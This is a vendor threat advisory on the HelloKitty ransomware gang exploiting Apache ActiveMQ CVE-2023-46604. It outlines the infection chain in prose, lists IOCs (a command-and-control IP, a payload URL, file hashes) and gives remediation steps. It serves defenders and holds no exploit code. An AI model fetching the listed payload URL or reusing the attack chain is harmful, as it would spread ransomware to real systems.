Rewterz Threat Alert – Apache ActiveMQ Vulnerability Exploited by HelloKitty Ransomware Gang – Active IOCs

Severity

High

Analysis Summary

Security experts are suspecting that the HelloKitty ransomware group is exploiting the recently disclosed critical vulnerability in the open-source message broker service Apache ActiveMQ that can result in remote code execution.

The source code of HelloKitty ransomware was leaked on a forum in October, and based on the ransom note, the current activity can be linked to the ransomware family.

“The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” said the researchers in a report.

The vulnerability that is being exploited is tracked as CVE-2023-46604, which is a highly critical remote code execution vulnerability with a CVSS score of 9.4. It is affecting ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3.

A proof-of-concept (PoC) exploit code has been made available publicly since the bug’s disclosure, and researchers have discovered that the behavior observed in the two reported victim networks seem to be the result of exploitation of CVE-2023-46604.

It is successfully exploited after threat actors try to load remote binaries called M2.png and M4.png which is achieved using the Windows Installer. The two MSI files include a 32-bit .NET executable named dillloader that is capable of loading a Base64-encoded payload named EncDLL. It works similarly to a ransomware capable of searching and terminating a specified bunch of processes before it starts the encryption process. It puts the “.locked” extension to the encrypted files.

A researcher group has found about 3,326 internet-facing ActiveMQ instances that are at risk and vulnerable to CVE-2023-46604. Most of these affected servers are located in China, Germany, the U.S., India, and South Korea.

Due to the active exploitation of this critical vulnerability, it is highly recommended for the users to upgrade immediately to the patched version of ActiveMQ as well as scam their networks for any indicators of compromise.

Impact

• Code Execution
• Financial Loss
• File Encryption
• Sensitive Data Theft

Indicators of Compromise

IP

• 172.245.16.125

MD5

• 478dcb54e0a610a160a079656b9582de
• c7198ed957a2e21b4a3349e9d2220690
• 26ff72b0b85e764400724e442c164046

SHA-256

• 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
• 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
• c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7

SHA-1

• 5ea03fa8326ed87a0c81740092c131f23bc5f651
• 5fc62671aef4b355d2050bf2904c7615cb0795ea
• c789942d013d8b45b6988ecc6491f5f1a1746311

URL

• http://172.245.16.125/m2.png

Remediation

• Upgrade to the latest version of Apache ActiveMQ, available from the Apache Website.
• Block all threat indicators at your respective controls.
• Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Implement strong email security measures, including spam filters and anti-phishing solutions, to prevent phishing emails that often serve as initial attack vectors for ransomware.
• Keep all software, including operating systems and applications, up to date with the latest security patches and updates to close vulnerabilities that ransomware may exploit.
• Regularly back up critical data and systems, and store backups offline.
• Employ network segmentation to isolate critical systems and limit lateral movement by attackers in case of a breach.
• Deploy strong endpoint security solutions that can detect and respond to malicious activities on devices within the network.
• Implement the principle of least privilege to limit user and system access to only what is necessary for their roles, reducing the impact of a breach.
• Use SIEM solutions to monitor network traffic for unusual or suspicious activities that may indicate a ransomware attack.
• Implement MFA for access to critical systems and accounts to enhance security.
• Develop and regularly test an incident response plan to ensure a coordinated and effective response in case of a ransomware attack.
• Educate users about the risks associated with ransomware, emphasizing the importance of not paying ransoms and reporting incidents promptly.
• Conduct regular vulnerability assessments and penetration testing to identify and address weaknesses in your systems and networks.
• Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
• Emails from unknown senders should always be treated with caution.